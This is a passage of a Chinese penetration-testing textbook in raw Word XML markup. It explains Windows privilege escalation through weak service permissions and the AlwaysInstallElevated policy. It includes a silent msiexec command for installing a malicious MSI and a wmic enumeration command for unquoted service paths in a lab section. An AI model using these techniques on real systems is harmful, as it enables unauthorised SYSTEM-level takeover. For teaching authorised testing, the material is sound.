      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Permissions）③</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">即使服务路径正确配置了引号，也仍然可能存在另一类配置错误：服务自身的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DACL（Discretionary</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Access Control </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">List，自由访问控制列表）配置过弱①。在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中，每一个服务对象（不仅仅是它的可执行文件）本身也有一个安全描述符，它定义了哪些用户或组可以对该服务执行何种操作——例如启动（Start）、停止（Stop）、暂停（Pause）、查询状态（Query），以及最危险的：修改配置（Change</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Config）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">如果一个低权限用户或组（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Authenticated Users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Everyone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）被错误地赋予了某个以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">身份运行的关键服务的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SERVICE_CHANGE_CONFIG</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限，那么攻击者就可以从根本上更改该服务的行为③。这通常不是直接修改原始服务的可执行文件路径，因为那通常会被杀毒软件或文件系统</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ACL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阻止；而是使用更隐秘的方法：更改该服务的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ImagePath</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注册表值，将其指向一个攻击者编写或复制的恶意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（该恶意文件本身可以只是一个启动反向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">然后立即退出并重新启动原始服务的“接力”程序，以最小化异常②）。更改完毕后，攻击者只需重启该服务，SCM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">便会以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上下文加载攻击者的恶意可执行文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者用于发现这类弱服务权限的经典工具思路（②，环境因版本而异）是枚举所有服务，然后检查哪些服务允许</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Everyone</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BUILTIN\Users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行修改。从原理上讲，这违反了服务对象的访问控制设计原则：服务配置的修改权应当严格限定在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrators</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">手中。任何普通用户能够修改的服务配置，都应被视为一个提权入口。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="290"/>
    <w:bookmarkStart w:id="291" w:name="alwaysinstallelevated-策略③"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. AlwaysInstallElevated </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">策略③</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">组策略中的一个特定配置，它允许非特权用户以提升的（即</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）权限运行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Microsoft Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Installer（MSI）软件包。这个策略本身是为企业环境中受管理的软件分发而设计的，但如果被错误地同时启用于“用户”和“计算机”两个层面，就会变成一个灾难性的提权漏洞①。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">其工作原理如下：如果本地组策略（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">gpedit.msc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）中的“计算机配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">组件</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Installer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">”和“用户配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">组件</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Installer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">”策略同时被启用，那么低权限用户便可以通过调用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">msiexec.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并指定一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.msi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安装包来以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限执行任意代码。攻击者可以构造一个恶意的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MSI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包（例如，使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">生成一个包含反向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">载荷的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MSI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件，这是纯粹的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CTF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">教学示例，③），然后运行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">msiexec /quiet /qn /i &lt;malicious.msi&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。由于策略的存在，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">msiexec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务进程会以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">身份运行安装过程，从而执行内含的攻击载荷。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这是一个规则违反的典型：策略的设计本意是允许管理员通过组策略在后台推送需要管理员权限的安装包给所有电脑，但在正确实践中，它应当仅启用“计算机配置”部分，这样只有分配了计算机启动脚本或后台管理权限的才可触发。同时启用用户配置，等于将“以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYSTEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">身份运行任意安装程序”的能力拱手交给了所有用户。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="291"/>
    <w:bookmarkEnd w:id="292"/>
    <w:bookmarkStart w:id="293" w:name="靶机与枚举实操单元授权靶场层面"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机与枚举实操单元（授权靶场层面）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节下面的命令为授权渗透测试中的标准枚举实践，用于发现上述配置错误。您必须在授权的靶机（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HackTheBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">主机，或自建的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞靶机）上执行，并将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和目标信息替换为占位符值（②）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤一：低权限立足点</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">假设您已通过第17章所述的方法获得一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或其它低权限</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">shell（例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">IIS APPPOOL\DefaultAppPool</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用户）。您当前没有管理员权限，需要提权。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤二：枚举不带引号的服务路径</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内置命令行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">wmic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">来提取服务路径信息：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">wmic service get name,displayname,pathname,startmode,startname </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">2&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">nul </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">findstr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"C:\Windows"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">findstr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令解释：该命令列出所有非微软自带服务的名称、路径、启动模式和启动身份，并通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">findstr /i /v """</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">筛选出路径中不包含双引号的服务。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期输出②</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：若有输出，则代表可能存在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Unquoted Service Path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。例如，你可能看到类似</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;SERVICE_NAME&gt; C:\Program Files\MyApp\service.exe Auto LocalSystem</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的条目。攻击者需要进一步确认该服务是否可由当前用户重启（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sc qc &lt;SERVICE_NAME&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），以及中间目录的权限（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">icacls "C:\Program Files\MyApp"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）来判断是否可利用。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">排错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：如果没有输出，不代表不存在此漏洞，因为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">wmic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的输出格式有时会因为列对齐问题导致正则匹配失败。更精确的枚举应使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PowerShell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Get-WmiObject win32_service</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">来编程化分析，并配合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Get-Acl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检查目录权限②。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤三：枚举弱服务权限</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
